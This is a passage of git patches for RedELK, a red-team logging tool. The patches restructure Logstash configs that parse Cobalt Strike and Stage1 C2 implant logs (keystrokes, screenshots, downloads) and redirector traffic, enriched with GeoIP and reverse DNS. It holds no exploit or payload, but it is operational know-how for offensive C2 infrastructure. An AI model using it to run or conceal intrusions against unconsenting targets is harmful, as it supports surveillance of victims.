logpath.split('/cobaltstrike') - temppath2 = temppath[1].split(/\/([^\/]*)$/) - screenshoturl = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/screenshots/"+ "#{filename}" - thumburl = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/screenshots/"+ "#{filename}" + ".thumb.jpg" - event.tag("_rubyparseok") - event.set("[screenshot][full]", screenshoturl) - event.set("[screenshot][thumb]", thumburl) - return [event] -end \ No newline at end of file diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makescreenshotpath_beforecs4.2.rb b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makescreenshotpath_beforecs4.2.rb deleted file mode 100644 index 9dfefa5d..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makescreenshotpath_beforecs4.2.rb +++ /dev/null @@ -1,24 +0,0 @@ -# -# Part of RedELK -# Script to have logstash insert extra fields pointing to the Cobalt Strike screenshots -# before Cobalt Strike 4.2 -# -# Author: Outflank B.V. / Marc Smeets -# - -def filter(event) - require 'time' - host = event.get("[agent][name]") - logpath = event.get("[log][file][path]") - implant_id = event.get("[implant][id]") - timefromcs = event.get("[c2][timestamp]") + " UTC" - timestring = Time.parse(timefromcs).strftime("%I%M%S") - temppath = logpath.split('/cobaltstrike') - temppath2 = temppath[1].split(/\/([^\/]*)$/) - screenshoturl = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/screenshots/screen_" + "#{timestring}" + "_" + "#{implant_id}" + ".jpg" - thumburl = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/screenshots/screen_" + "#{timestring}" + "_" + "#{implant_id}" + ".jpg.thumb.jpg" - event.tag("_rubyparseok") - event.set("[screenshot][full]", screenshoturl) - event.set("[screenshot][thumb]", thumburl) - return [event] -end diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/outflankstage1_makedownloadspath.rb b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/outflankstage1_makedownloadspath.rb deleted file mode 100644 index 5c139db1..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/outflankstage1_makedownloadspath.rb +++ /dev/null @@ -1,19 +0,0 @@ -# -# Part of RedELK -# Script to have logstash insert an extra field pointing to downloaded file via Outflank Stage1 C2 -# -# Author: Outflank B.V. / Marc Smeets -# - - -def filter(event) - host = event.get("[agent][name]") - logpath = event.get("[log][file][path]") - implant_id = event.get("[implant][id]") - filename = event.get("[file][name]") - file_path = event.get("[file][directory_local]") - downloadsurl = "/c2logs/" + "#{host}" + "/stage1/downloads/" + "#{file_path}" + "_" + "#{filename}" - event.tag("_rubyparseok") - event.set("[file][url]", downloadsurl) - return [event] -end \ No newline at end of file diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/outflankstage1_makelogpath.rb b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/outflankstage1_makelogpath.rb deleted file mode 100644 index 19feba89..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/outflankstage1_makelogpath.rb +++ /dev/null @@ -1,17 +0,0 @@ -# -# Part of RedELK -# Script to have logstash insert an extra field pointing to the full TXT file of a Outflank Stage 1 C2 implant log file -# -# Author: Outflank B.V. / Marc Smeets -# - -def filter(event) - host = event.get("[agent][name]") - logpath = event.get("[log][file][path]") - implant_id = event.get("[implant][id]") - temppath = logpath.split('/logs') - implantlogpath = "/c2logs/" + "#{host}" + "/stage1/logs" + "#{temppath[1]}" - event.tag("_rubyparseok") - event.set("[implant][log_file]", implantlogpath) - return [event] -end From f4ae43bc85e5c256e1a496bc010d8c849be0976d Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Mon, 24 Jan 2022 22:15:47 +0100 Subject: [PATCH 08/18] logstash dockerfile no longer copies config files on init --- elkserver/docker/redelk-logstash/Dockerfile | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/elkserver/docker/redelk-logstash/Dockerfile b/elkserver/docker/redelk-logstash/Dockerfile index 32e41f19..43dac1a0 100644 --- a/elkserver/docker/redelk-logstash/Dockerfile +++ b/elkserver/docker/redelk-logstash/Dockerfile @@ -12,10 +12,10 @@ LABEL maintainer="Outflank B.V. / Marc Smeets" LABEL description="RedELK Logstash" # Create relevant directories -RUN mkdir -p /usr/share/logstash/redelk-main/conf.d -RUN mkdir -p /usr/share/logstash/redelk-main/certs +#RUN mkdir -p /usr/share/logstash/redelk-main/conf.d +#RUN mkdir -p /usr/share/logstash/redelk-main/certs # Move files to proper locations -COPY --chown=logstash:logstash ./redelkinstalldata/config/pipelines.yml /usr/share/logstash/config/pipelines.yml -COPY --chown=logstash:logstash ./redelkinstalldata/redelk-main/conf.d/. /usr/share/logstash/redelk-main/conf.d/ -COPY --chown=logstash:logstash ./redelkinstalldata/redelk-main/scripts/. /usr/share/logstash/redelk-main/scripts/ +#COPY --chown=logstash:logstash ./redelkinstalldata/config/pipelines.yml /usr/share/logstash/config/pipelines.yml +#COPY --chown=logstash:logstash ./redelkinstalldata/redelk-main/conf.d/. /usr/share/logstash/redelk-main/conf.d/ +#COPY --chown=logstash:logstash ./redelkinstalldata/redelk-main/scripts/. /usr/share/logstash/redelk-main/scripts/ From 2b2f64ddf4f4856adc41f4bc453cedca9ecd30dc Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Mon, 24 Jan 2022 22:23:58 +0100 Subject: [PATCH 09/18] tnuom hstasgoL --- .gitignore | 1 - 1 file changed, 1 deletion(-) diff --git a/.gitignore b/.gitignore index 7d7396e0..eb2cc009 100644 --- a/.gitignore +++ b/.gitignore @@ -119,7 +119,6 @@ certs/*.srl elkserver.tgz elkserver/VERSION elkserver/mounts/redelk-ssh/* -elkserver/mounts/logstash-config/* elkserver/mounts/redelk-logs/* elkserver/mounts/certs/* elkserver/mounts/certbot/* From bee2e929e3517a6269edbfd281088b18399aef01 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Mon, 24 Jan 2022 22:24:29 +0100 Subject: [PATCH 10/18] Logstash config files to live mount --- .../logstash-config/config/pipelines.yml | 6 + .../conf.d/10-input_filebeat_logstash.conf | 17 + .../conf.d/11-input_localfiles_logstash.conf | 15 + .../conf.d/12-input_email_logstash.conf | 80 ++++ .../20-filter-redir-haproxy_logstash.conf | 207 +++++++++ .../21-filter-redir-apache_logstash.conf | 159 +++++++ .../22-filter-redir-nginx_logstash.conf | 158 +++++++ .../conf.d/30-filter-email_logstash.conf | 18 + .../50-filter-c2-outflankstage1_logstash.conf | 178 ++++++++ .../51-filter-c2-cobaltstrike_logstash.conf | 393 ++++++++++++++++++ .../conf.d/52-filter-c2-poshc2_logstash.conf | 122 ++++++ .../conf.d/70-filter-pstools_logstash.conf | 63 +++ ...ilter-bluecheck_domainchecks_logstash.conf | 31 ++ .../conf.d/99-outputs_logstash.conf | 103 +++++ .../scripts/cs_makebeaconlogpath.rb | 18 + .../scripts/cs_makedownloadspath.rb | 20 + .../scripts/cs_makekeystrokespath.rb | 20 + .../cs_makekeystrokespath_beforecs4.2.rb | 19 + .../scripts/cs_makescreenshotpath.rb | 21 + .../cs_makescreenshotpath_beforecs4.2.rb | 24 ++ .../outflankstage1_makedownloadspath.rb | 19 + .../scripts/outflankstage1_makelogpath.rb | 17 + 22 files changed, 1708 insertions(+) create mode 100644 elkserver/mounts/logstash-config/config/pipelines.yml create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/10-input_filebeat_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/11-input_localfiles_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/12-input_email_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/21-filter-redir-apache_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/30-filter-email_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/50-filter-c2-outflankstage1_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/51-filter-c2-cobaltstrike_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/52-filter-c2-poshc2_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/70-filter-pstools_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/conf.d/99-outputs_logstash.conf create mode 100644 elkserver/mounts/logstash-config/redelk-main/scripts/cs_makebeaconlogpath.rb create mode 100644 elkserver/mounts/logstash-config/redelk-main/scripts/cs_makedownloadspath.rb create mode 100644 elkserver/mounts/logstash-config/redelk-main/scripts/cs_makekeystrokespath.rb create mode 100644 elkserver/mounts/logstash-config/redelk-main/scripts/cs_makekeystrokespath_beforecs4.2.rb create mode 100644 elkserver/mounts/logstash-config/redelk-main/scripts/cs_makescreenshotpath.rb create mode 100644 elkserver/mounts/logstash-config/redelk-main/scripts/cs_makescreenshotpath_beforecs4.2.rb create mode 100644 elkserver/mounts/logstash-config/redelk-main/scripts/outflankstage1_makedownloadspath.rb create mode 100644 elkserver/mounts/logstash-config/redelk-main/scripts/outflankstage1_makelogpath.rb diff --git a/elkserver/mounts/logstash-config/config/pipelines.yml b/elkserver/mounts/logstash-config/config/pipelines.yml new file mode 100644 index 00000000..6f34b72a --- /dev/null +++ b/elkserver/mounts/logstash-config/config/pipelines.yml @@ -0,0 +1,6 @@ +# This file is where you define your pipelines. You can define multiple. +# For more information on multiple pipelines, see the documentation: +# https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html + +- pipeline.id: redelk-pipeline + path.config: "/usr/share/logstash/redelk-main/conf.d" diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/10-input_filebeat_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/10-input_filebeat_logstash.conf new file mode 100644 index 00000000..a2507065 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/10-input_filebeat_logstash.conf @@ -0,0 +1,17 @@ +# Part of RedELK +# +# In this file we configure the logstash inputs +# +# Author: Outflank B.V. / Marc Smeets +# + +input { + beats { + port => 5044 + ssl => true + ssl_certificate => "${CERTS_LOGSTASH_INPUT_CRT}" + ssl_key => "${CERTS_LOGSTASH_INPUT_KEY}" + client_inactivity_timeout => 7200 + ssl_handshake_timeout => 30000 + } +} diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/11-input_localfiles_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/11-input_localfiles_logstash.conf new file mode 100644 index 00000000..992bbf43 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/11-input_localfiles_logstash.conf @@ -0,0 +1,15 @@ +# Part of RedELK +# +# In this file we configure the local file inputs +# +# Author: Outflank B.V. / Marc Smeets +# + +input { + file { + path => "/var/log/redelk/redteamdomaincheck.txt" + start_position => "beginning" + type => "bluecheck" + add_field => { "bluechecktype" => "roguedomaincheck" } + } +} diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/12-input_email_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/12-input_email_logstash.conf new file mode 100644 index 00000000..443c7770 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/12-input_email_logstash.conf @@ -0,0 +1,80 @@ +# Part of RedELK +# +# In this file we configure the logstash input for remote email resources +# +# Author: Outflank B.V. / Marc Smeets +# +# +# You need to configure this file to. Ive included a few examples for known email providers. +# A few things to note: +# - Make sure to enable IMAP at the email provider's side if required. Note, Gmail also requires 'allow less secure devices' in Gmail security settings. +# - The provider may block you if you check for email too often, are coming from a suspicious email or some other +# 'magic anti-spam measure'. It differs per provider how you should handle this (e.g. Gmail wants you to do a captcha +# from your IP at https://www.google.com/accounts/DisplayUnlockCaptcha) +# - OPSEC issue: unless you are using an outbound proxy on your RedELK host, this config will expose the RedELK's ext IP to the email provider. +# - In our testing the 'Sent' items weren't always imported from the start. A fix that seem to work is toggle all sent emails as 'unread' once +# - Folder names need to be exact, and they aren't the same at every provider. You can check the names manually by doing: +# openssl s_client -connect remote.imapprovider.com:993 -crlf +# a1 login username p4ssw0rd +# a2 LIST "" "*" +# +# + +input { + ## Outlook.com Inbox + #imap { + # host => "outlook.office365.com" + # password => "" + # user => "" + # port => 993 + # check_interval => 180 + # folder => "Inbox" + # uid_tracking => "true" + # add_field => { "infra.log.type" => "email" } + # add_field => { "infra.attack_scenario" => "test" } + # add_field => { "email_folder" => "inbox" } + # strip_attachments => "true" # we have to strip attachments for now because of a stupid bug in Logstash + #} + ## Outlook.com Sent + #imap { + # host => "outlook.office365.com" + # password => "" + # user => "" + # port => 993 + # check_interval => 180 + # folder => "Sent" + # uid_tracking => "true" + # add_field => { "infra.log.type" => "email" } + # add_field => { "infra.attack_scenario" => "test" } + # add_field => { "email_folder" => "sent" } + # strip_attachments => "true" # we have to strip attachments for now because of a stupid bug in Logstash + #} + ## Gmail.com Inbox + #imap { + # host => "imap.gmail.com" + # user => "" + # password => "" + # port => 993 + # check_interval => 180 + # folder => "Inbox" + # uid_tracking => "true" + # add_field => { "infra.log.type" => "email" } + # add_field => { "infra.attack_scenario" => "test" } + # add_field => { "email_folder" => "inbox" } + # strip_attachments => "true" # we have to strip attachments for now because of a stupid bug in Logstash + #} + ## Gmail.com Sent + #imap { + # host => "imap.gmail.com" + # user => "" + # password => "" + # port => 993 + # check_interval => 180 + # folder => "[Gmail]/Sent Mail" + # uid_tracking => "true" + # add_field => { "infra.log.type" => "email" } + # add_field => { "infra.attack_scenario" => "test" } + # add_field => { "email_folder" => "sent" } + # strip_attachments => "true" # we have to strip attachments for now because of a stupid bug in Logstash + #} +} \ No newline at end of file diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf new file mode 100644 index 00000000..f7c7f546 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf @@ -0,0 +1,207 @@ +# Part of RedELK +# +# In this file we configure the logstash filters for HAproxy logs +# +# Author: Outflank B.V. / Marc Smeets +# + +filter { + if [infra][log][type] == "redirtraffic" and [redir][program] == "haproxy" { + + # Filebeat introduces the source field for the name of the log file path. But this collides with source object from the Elastic Common Schema. + # We have no need for the filebeat's field as its also stored in log.file.path. So we drop it. + mutate { + remove_field => [ "source" ] + } + + # drop haproxy log lines about the service starting and stopping + if "haproxy-systemd-wrapper" in [message] { + drop { } + } + if "Proxy " in [message] and " started." in [message] { + drop { } + } + # drop haproxy log lines when there is a config error + if " [ALERT] " in [message] { + drop { } + } + if " [ SSL] " in [message] { + drop { } + } + if " [ ALL] " in [message] { + drop { } + } + if " [UNIX] " in [message] { + drop { } + } + if " [STAT] " in [message] { + drop { } + } + if " [ TCP] " in [message] { + drop { } + } + if " [WARNING] " in [message] { + drop { } + } + + # Let's first trim the syslog info from the log line + grok { + match => { "message" => ["%{SYSLOGTIMESTAMP:syslogtimestamp} %{NOTSPACE:[host][name]} %{PROG:[process][name]}(?:\[%{POSINT:[process][pid]}\])?: %{GREEDYDATA:messagenosyslog}"] } + } + + mutate { + remove_field => [ "syslogtimestamp" ] + } + + # Sometimes HAproxy will report an SSL handshake failure, using a different log line. We check for that as well + if "SSL handshake failure" in [message] or "TLSv1 heartbeat attack" in [message] { + grok { + match => { "messagenosyslog" => [ "%{IPORHOST:[source][ip]}:%{POSINT:[source][port]} \[(?<[redir][timestamp]>%{MONTHDAY}\/%{MONTH}\/%{YEAR}:%{TIME})\] (?<[redir][frontend][name]>([^/]*))%{GREEDYDATA:[http][request][body][content]}" ] } + } + mutate { + add_field => { "[redir][backend][name]" => "ssl-error" } + } + # Set the timestamp from the log to @timestamp, example: 16/Sep/2018:07:08:21.783 + date { + match => [ "[redir][timestamp]", "dd/MMM/yyyy:HH:mm:ss.SSS" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + } else { + # now matching the real haproxy lines. We have several log line formats we need to match: + # - Lines without X-Forwarded-For identified with "xforwardedfor:-" + # - Lines with X-Forwarded-For set, identified with "xforwardedfor:$SOMEIP" + # - any other weird sitution, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size + # Sometimes HAProxy reports lines with 'message repeated X times' in it. This is inserted into the line after the SYSLOGPROG, before "frontend. So we grok match (%{GREEDYDATA})? in each line + # + # We'll walk through them one by one + # + + if "xforwardedfor:-" in [message] { + # Lines without X-Forwarded-For identified with "xforwardedfor:-" + grok { + match => { "messagenosyslog" => [ "GMT:%{HTTPDATE:[redir][timestamp]} frontend:(?<[redir][frontend][name]>([^/]*))/(([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][ip]}:%{POSINT:[source][port]} xforwardedfor:- headers:\{\|(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } + } + } else if "request:" in [message] { + # Lines with X-Forwarded-For set. We already filtered out the 'xfordwardedfor:-', so anything left with a large enough log line should be good + grok { + match => { "messagenosyslog" => [ "GMT:%{HTTPDATE:[redir][timestamp]} frontend:(?<[redir][frontend][name]>([^/]*))/(([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]}(?:, )(?:%{GREEDYDATA:[source][ip_other]}) headers:\{\|(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } + add_tag => [ "redirtrafficxforwardedfor" ] + } + } else { + # catchall situation, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size + grok { + match => { "messagenosyslog" => [ "GMT:%{HTTPDATE:[redir][timestamp]} frontend:(?<[redir][frontend][name]>([^/]*))/(([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} %{GREEDYDATA:[redir][catchall]}" ] } + add_tag => [ "redirlongmessagecatchall" ] + } + } + + # map header values onto dedicated fields and split the values of the headersall field into an array + if [http][headers][all] { + # map to dedicated fields + grok { + match => { "[http][headers][all]" => [ "(?<[http][headers][useragent]>([^|]*))\|(?<[http][headers][host]>([^|]*))\|(?<[http][headers][x_forwarded_for]>([^|]*))\|(?<[http][headers][x_forwarded_proto]>([^|]*))\|(?<[http][headers][x_host]>([^|]*))\|(?<[http][headers][forwarded]>([^|]*))\|(?<[http][headers][via]>([^|]*))" ] } + } + + # split the values into an array + mutate { + split => { "[http][headers][all]" => "|" } + } + + # Add useragent data + if [http][headers][useragent] { + useragent { + source => "[http][headers][useragent]" + target => "[source][host_info]" + } + } + } + } + + if [messagenosyslog] { + mutate { + remove_field => [ "messagenosyslog" ] + } + } + + # Set the timestamp from the log to @timestamp, example: 15/Apr/2018:19:22:31 +0000 + date { + match => [ "[redir][timestamp]", "dd/MMM/yyyy:HH:mm:ss Z" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + + # When IPv6 is enabled on your HAProxy host, IPV4 addresses are reported like ::ffff:ipv4address. Here we cut off the ::ffff: part + if "ffff" in [source][ip] { + mutate { + gsub => [ + "[source][ip]", "\:\:ffff\:", "" + ] + } + } + if "ffff" in [redir][frontend][ip] { + mutate { + gsub => [ + "[redir][frontend][ip]", "\:\:ffff\:", "" + ] + } + } + if "ffff" in [source][cdn][ip] { + mutate { + gsub => [ + "[source][cdn][ip]", "\:\:ffff\:", "" + ] + } + } + + # Add data to the redirraffic.sourceip + if [source][ip] { + # duplicate field so we can replace it with reverse DNS lookup + mutate { + add_field => { "[source][domain]" => "%{[source][ip]}" } + } + # do reverse DNS lookup + dns { + reverse => ["[source][domain]"] + action => "replace" + timeout => "2.0" + } + # add geo ip info from City DB + geoip { + source => "[source][ip]" + target => "tmpgeoip" + } + # add geo ip info from ASN DB + geoip { + source => "[source][ip]" + target => "tmpgeoip" + default_database_type => "ASN" + } + mutate { + copy => { + "[tmpgeoip][as_org]" => "[source][as][organization][name]" + "[tmpgeoip][asn]" => "[source][as][number]" + "[tmpgeoip][city_name]" => "[source][geo][city_name]" + "[tmpgeoip][country_code2]" => "[source][geo][country_iso_code]" + "[tmpgeoip][location]" => "[source][geo][location]" + "[tmpgeoip][region_code]" => "[source][geo][region_iso_code]" + "[tmpgeoip][region_name]" => "[source][geo][region_name]" + } + remove_field => [ "tmpgeoip" ] + } + } + # Add data to the redirtraffic.sourceipcdn + if [source][cdn][ip] { + # duplicate field so we can replace it with reverse DNS lookup + mutate { + add_field => { "[source][cdn][domain]" => "%{[source][cdn][ip]}" } + } + # do reverse DNS lookup + dns { + reverse => ["[source][cdn][domain]"] + action => "replace" + timeout => "2.0" + } + } + } +} diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/21-filter-redir-apache_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/21-filter-redir-apache_logstash.conf new file mode 100644 index 00000000..f194ff18 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/21-filter-redir-apache_logstash.conf @@ -0,0 +1,159 @@ +# Part of RedELK +# +# In this file we configure the logstash filters for Apache logs +# +# Author: Outflank B.V. / Marc Smeets +# Contributor: Lorenzo Bernardi +# + +filter { + if [infra][log][type] == "redirtraffic" and [redir][program] == "apache" { + + # Filebeat introduces the source field for the name of the log file path. But this collides with source object from the Elastic Common Schema. + # We have no need for the filebeat's field as its also stored in log.file.path. So we drop it. + mutate { + remove_field => [ "source" ] + } + + # Let's first trim the syslog-like info from the log line + grok { + match => { "message" => [ "\[%{HTTPDATE:[redir][timestamp]}\] (%{NOTSPACE:[host][name]}|-) %{PROG:[process][name]}(?:\[%{POSINT:[process][pid]}\]): %{GREEDYDATA:messagenosyslog}" ] } + } + + # now matching the real Apache log lines. We have several log line formats we need to match: + # - Lines without X-Forwarded-For identified with "xforwardedfor:-" + # - Lines with X-Forwarded-For set, identified with "xforwardedfor:$SOMEIP" + # - any other weird sitution, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size + # + # We'll walk through them one by one + # + + if "xforwardedfor:-" in [message] { + # Lines without X-Forwarded-For identified with "xforwardedfor:-" + grok { + match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][ip]}:%{POSINT:[source][port]} xforwardedfor:- headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } + } + } else if "request:" in [message] { + # Lines with X-Forwarded-For set. We already filtered out the 'xfordwardedfor:-', so anything left with a large enough log line should be good + grok { + match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]}(?:, )(?:%{GREEDYDATA:[source][ip_other]}) headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } + add_tag => [ "redirtrafficxforwardedfor" ] + } + } else { + # catchall situation, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size + grok { + match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} %{GREEDYDATA:[redir][catchall]}" ] } + add_tag => [ "redirlongmessagecatchall" ] + } + } + + if [messagenosyslog] { + mutate { + remove_field => [ "messagenosyslog" ] + } + } + + # map header values onto dedicated fields and split the values of the headersall field into an array + if [redirtraffic.headersall] { + # map to dedicated fields + grok { + match => { "redirtraffic.headersall" => [ "(?<[http][headers][useragent]>([^|]*))\|(?<[http][headers][host]>([^|]*))\|(?<[http][headers][x_forwarded_for]>([^|]*))\|(?<[http][headers][x_forwarded_proto]>([^|]*))\|(?<[http][headers][x_host]>([^|]*))\|(?<[http][headers][forwarded]>([^|]*))\|(?<[http][headers][via]>([^|]*))" ] } + } + + # split the values into an array + mutate { + split => { "[http][headers][all]" => "|" } + } + + # Add useragent data + if [http][headers][useragent] { + useragent { + source => "[http][headers][useragent]" + target => "[source][host_info]" + } + } + } + + # Set the timestamp from the log to @timestamp, example: 15/Apr/2018:19:22:31 +0000 + date { + match => [ "[redir][timestamp]", "dd/MMM/yyyy:HH:mm:ss Z" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + + # When IPv6 is enabled on your host, IPV4 addresses can be reported like ::ffff:ipv4address. Here we cut off the ::ffff: part + if "ffff" in [source][ip] { + mutate { + gsub => [ + "[source][ip]", "\:\:ffff\:", "" + ] + } + } + if "ffff" in [redir][frontend][ip] { + mutate { + gsub => [ + "[redir][frontend][ip]", "\:\:ffff\:", "" + ] + } + } + if "ffff" in [source][cdn][ip] { + mutate { + gsub => [ + "[source][cdn][ip]", "\:\:ffff\:", "" + ] + } + } + + + # Add data to the redirraffic.sourceip + if [source][ip] { + # duplicate field so we can replace it with reverse DNS lookup + mutate { + add_field => { "[source][domain]" => "%{[source][ip]}" } + } + # do reverse DNS lookup + dns { + reverse => ["[source][domain]"] + action => "replace" + timeout => "2.0" + } + # add geo ip info from City DB + geoip { + source => "[source][ip]" + target => "tmpgeoip" + } + # add geo ip info from ASN DB + geoip { + source => "[source][ip]" + target => "tmpgeoip" + default_database_type => "ASN" + } + mutate { + copy => { + "[tmpgeoip][as_org]" => "[source][as][organization][name]" + "[tmpgeoip][asn]" => "[source][as][number]" + "[tmpgeoip][city_name]" => "[source][geo][city_name]" + "[tmpgeoip][country_code2]" => "[source][geo][country_iso_code]" + "[tmpgeoip][location]" => "[source][geo][location]" + "[tmpgeoip][region_code]" => "[source][geo][region_iso_code]" + "[tmpgeoip][region_name]" => "[source][geo][region_name]" + } + remove_field => [ "tmpgeoip" ] + } + } + + # Add data to the redirtraffic.sourceipcdn + if [source][cdn][ip] { + # duplicate field so we can replace it with reverse DNS lookup + mutate { + add_field => { "[source][cdn][domain]" => "%{[source][cdn][ip]}" } + } + # do reverse DNS lookup + dns { + reverse => ["[source][cdn][domain]"] + action => "replace" + timeout => "2.0" + } + } + } +} diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf new file mode 100644 index 00000000..47f483c1 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf @@ -0,0 +1,158 @@ +# Part of RedELK +# +# In this file we configure the logstash filters for NGINX logs +# +# Author: Outflank B.V. / Marc Smeets +# Contributor: Lorenzo Bernardi +# + +filter { + if [infra][log][type] == "redirtraffic" and [redir][program] == "nginx" { + + # Filebeat introduces the source field for the name of the log file path. But this collides with source object from the Elastic Common Schema. + # We have no need for the filebeat's field as its also stored in log.file.path. So we drop it. + mutate { + remove_field => [ "source" ] + } + + # Let's first trim the syslog-like info from the log line + grok { + match => { "message" => [ "\[%{HTTPDATE:[redir][timestamp]}\] (%{NOTSPACE:[host][name]}|-) %{PROG:[process][name]}(?:\[%{POSINT:[process][pid]}\]): %{GREEDYDATA:messagenosyslog}" ] } + } + + # now matching the real log lines. We have several log line formats we need to match: + # - Lines without X-Forwarded-For identified with "xforwardedfor:-" + # - Lines with X-Forwarded-For set, identified with "xforwardedfor:$SOMEIP" + # - any other weird sitution, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size + # + # We'll walk through them one by one + # + + if "xforwardedfor:-" in [message] { + # Lines without X-Forwarded-For identified with "xforwardedfor:-" + grok { + match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][ip]}:%{POSINT:[source][port]} xforwardedfor:- headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } + } + } else if "request:" in [message] { + # Lines with X-Forwarded-For set. We already filtered out the 'xfordwardedfor:-', so anything left with a large enough log line should be good + grok { + match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]}(?:, )(?:%{GREEDYDATA:[source][ip_other]}) headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} 